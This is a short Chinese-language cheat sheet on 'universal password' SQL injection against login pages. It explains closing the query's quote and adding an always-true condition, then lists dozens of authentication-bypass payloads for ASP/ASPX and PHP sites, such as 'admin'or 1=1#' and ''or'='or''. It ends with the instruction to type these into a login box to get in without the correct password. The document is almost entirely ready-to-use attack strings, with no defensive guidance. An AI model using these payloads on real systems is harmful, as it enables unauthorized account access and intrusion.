[TOC] ## 万能密码原理 闭合 构造为真的条件 在后台登陆页面没有对用户输入的内容进行验证，此时程序所用用户输入的数据都合法的，所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的 ## 万能密码常用函数 ~~~ ' or 或者 || ~~~ ## 万能密码语句 ### asp aspx万能密码 ``` admin'or 1=1# 1："or "a"="a 2：'.).or.('.a.'='.a 3：or 1=1-- 4：'or 1=1-- 5：a'or' 1=1-- 6："or 1=1-- 7：'or.'a.'='a 8："or"="a'='a 9：'or''=' 10：'or'='or' ``` ### PHP万能密码 ``` admin'/\* 密码\*/' 'or 1=1/\* "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1-- "or=or" ''or'='or' ') or ('a'='a '.).or.('.a.'='.a 'or 1=1 'or 1=1-- 'or 1=1/* 'or"="a'='a 'or' '1'='1' 'or''=' 'or''=''or''=' 'or'='1' 'or'='or' 'or.'a.'='a 'or1=1-- 1'or'1'='1 a'or' 1=1-- a'or'1=1-- or 'a'='a' or 1=1-- or1=1-- ``` ## 万能密码的利用 在登陆框当中，先把前面的符号闭合，然后输入自己创建的构造为真的条件，即可不需要正确密码就可以登陆